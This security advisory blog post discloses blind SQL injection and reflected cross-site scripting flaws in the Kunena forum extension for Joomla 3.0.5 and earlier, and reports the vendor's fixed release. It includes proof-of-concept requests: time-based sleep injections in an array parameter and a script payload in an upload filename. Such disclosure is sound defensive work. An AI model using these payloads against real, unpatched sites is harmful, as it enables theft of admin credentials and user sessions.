• Oxford: +44 (0)1865 877830 
  • Manchester: +44 (0)161 713 0176 
  • Edinburgh: +44 (0)131 541 0118 
  • New York: +1 646-781-7580 
  • Bucharest: +40 316 301 707 
  • Tokyo: +81 (3) 4588 8181 

Kunena Forum for Joomla Multiple Vulnerabilities

You are here

28

Jul

Kunena Forum for Joomla Multiple Vulnerabilities

The Kunena forum extension for Joomla suffers from multiple SQL injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. The vulnerabilities affect Kunena v3.0.5 and earlier.

The blind SQL injection vulnerability affects all pages/tasks that use parameters in the form of “parameter[]”. This is because the array index is not being validated. Attackers can use the vulnerability to read sensitive data stored in the Joomla database including the website’s admin users’ credentials. This can then be used to compromise the entire website.

Blind SQL injection relies on the ability to determine whether a condition is true or false, by causing a change in the behaviour of the affected application, for example the creation of different response times from the application, as shown in the following examples.

A true condition will cause a 10 second delay in the server’s response:

POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d1,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go

 Response time: ~ 11.5 seconds

 A false condition will cause the server to respond without delay:

 POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d2,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go

 Response time: ~ 1.5 seconds

 The file upload and profile image upload functionality available on the forum extension are vulnerable to reflected cross-site scripting. Moreover, all of the pages that are vulnerable to the blind SQL injection are also vulnerable to reflected cross-site scripting due to the detailed error message returned by the server.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks such as drive-by downloads.

The following proof of concept example shows how an attacker can exploit the vulnerability on the profile image upload functionality in order to display an alert box:

POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

-----------------------------34391417828549

Content-Disposition: form-data; name="view"

user

-----------------------------34391417828549

Content-Disposition: form-data; name="task"

Save

[…]

Content-Disposition: form-data; name="avatarfile"; filename="<iframe src=javascript:alert('XSS')>"

[…]

 

 Solution

The vendor has released a new version (3.0.6) to address the security vulnerabilities discovered by Dionach. The new version was released on the 28th of July 2014. Users are advised to update the Kunena forum extension for Joomla to the latest secure and stable version.

References

http://www.kunena.org/docs/Kunena_3.0.6_Read_Me

http://www.securityfocus.com/bid/68956/

 

Posted by Ray

Leave a comment